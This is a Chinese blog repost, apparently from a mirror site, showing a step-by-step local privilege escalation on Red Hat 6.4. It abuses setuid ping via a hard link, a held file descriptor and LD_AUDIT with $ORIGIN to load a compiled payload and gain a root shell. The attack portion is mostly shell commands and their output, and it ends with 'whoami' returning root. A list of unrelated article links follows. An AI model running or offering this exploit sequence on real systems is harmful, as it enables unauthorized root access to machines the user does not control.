当前位置: 首页 > news >正文

redhat6.4提权Ⅱ

news 来源:原创 2024/4/30 3:39:44

本次演示只针对redhat6.4, 其他的系统不知道有没有效果。

下面开始吧

建立普通用户并授予密码

[root@localhost yum.repos.d]# useradd test
[root@localhost yum.repos.d]# passwd test
更改用户 test 的密码 。
新的 密码:
无效的密码: 它基于字典单词
重新输入新的 密码:
passwd: 所有的身份验证令牌已经成功更新。

切换身份

[root@localhost yum.repos.d]# su - test
[test@localhost ~]$ whoami
test

演示权限

[test@localhost ~]$ useradd aaa
-bash: /usr/sbin/useradd: 权限不够

下面开始利用ping

[test@localhost ~]$ mkdir /tmp/exploit
[test@localhost ~]$ ln /bin/ping /tmp/exploit/target
[test@localhost ~]$ exec 3< /tmp/exploit/target
[test@localhost ~]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 2月  27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target
[test@localhost ~]$ rm -rf /tmp/exploit/
[test@localhost ~]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 2月  27 00:17 /proc/1665/fd/3 -> /tmp/exploit/target (deleted)

下面使用gcc提权

[test@localhost ~]$ vim payload.c
[test@localhost ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@localhost ~]$ ls
payload.c
[test@localhost ~]$ ls -l /tmp/exploit
-rwxrwxr-x. 1 test test 6060 2月  27 00:18 /tmp/exploit
[test@localhost ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@localhost yum.repos.d]# whoami
root
[root@localhost yum.repos.d]#

一气呵成!

 

转载于:https://www.cnblogs.com/chenglee/p/10438225.html

相关文章:

  • 运算符和自增自减
  • ☆1033
  • 用Node EJS写一个爬虫脚本每天定时给心爱的她发一封暖心邮件
  • linux下实用的快速随机生成复杂密码
  • 互联网世界,联通你我,这40张图送给你!让你笑到肚子疼!
  • WinDbg 命令三部曲:(二)WinDbg SOS 扩展命令手
  • 使用Envoy 作Sidecar Proxy的微服务模式-4.Prometheus的指标收集
  • 手写双向链表LinkedList的几个常用功能
  • Python中eval与exec的使用及区别
  • CSS选择器介绍和优先级
  • PPT设计网站 驼峰设计
  • js实现简易的touch事件(es5)
  • Mac OS安装Docker容器的3种方式与差别:Docker for Mac
  • 基于MicroPython的家庭可燃气体泄露微信报警器
  • 使用ABAP代码创建S/4HANA里的Sales Order
  • CentOS从零开始部署Nodejs项目
  • happypack两次报错的问题
  • Invalidate和postInvalidate的区别
  • JavaScript设计模式系列一:工厂模式
  • Less 日常用法
  • mac修复ab及siege安装
  • REST架构的思考
  • vue数据传递--我有特殊的实现技巧
  • 来,膜拜下android roadmap,强大的执行力
  • 马上搞懂 GeoJSON
  • 前端
  • 全栈开发——Linux
  • 小程序开发中的那些坑
  • 中国人寿如何基于容器搭建金融PaaS云平台
  • 3月7日云栖精选夜读 | RSA 2019安全大会:企业资产管理成行业新风向标,云上安全占绝对优势 ...
  • ​secrets --- 生成管理密码的安全随机数​
  • (7)STL算法之交换赋值
  • (C语言)求出1,2,5三个数不同个数组合为100的组合个数
  • (k8s中)docker netty OOM问题记录
  • (附源码)spring boot基于Java的电影院售票与管理系统毕业设计 011449
  • (附源码)springboot青少年公共卫生教育平台 毕业设计 643214
  • (详细版)Vary: Scaling up the Vision Vocabulary for Large Vision-Language Models
  • (一)ClickHouse 中的 `MaterializedMySQL` 数据库引擎的使用方法、设置、特性和限制。
  • (译) 函数式 JS #1:简介
  • (原創) 系統分析和系統設計有什麼差別? (OO)
  • (源码版)2024美国大学生数学建模E题财产保险的可持续模型详解思路+具体代码季节性时序预测SARIMA天气预测建模
  • (自用)learnOpenGL学习总结-高级OpenGL-抗锯齿
  • ******之网络***——物理***
  • ./mysql.server: 没有那个文件或目录_Linux下安装MySQL出现“ls: /var/lib/mysql/*.pid: 没有那个文件或目录”...
  • .NET 8.0 发布到 IIS
  • .NET Core日志内容详解,详解不同日志级别的区别和有关日志记录的实用工具和第三方库详解与示例
  • .NET delegate 委托 、 Event 事件,接口回调
  • .NET开源项目介绍及资源推荐:数据持久层 (微软MVP写作)
  • .net网站发布-允许更新此预编译站点
  • /etc/X11/xorg.conf 文件被误改后进不了图形化界面
  • @Controller和@RestController的区别?
  • @Transactional 竟也能解决分布式事务?
  • @德人合科技——天锐绿盾 | 图纸加密软件有哪些功能呢?
  • [ linux ] linux 命令英文全称及解释
  • [2019.2.28]BZOJ4033 [HAOI2015]树上染色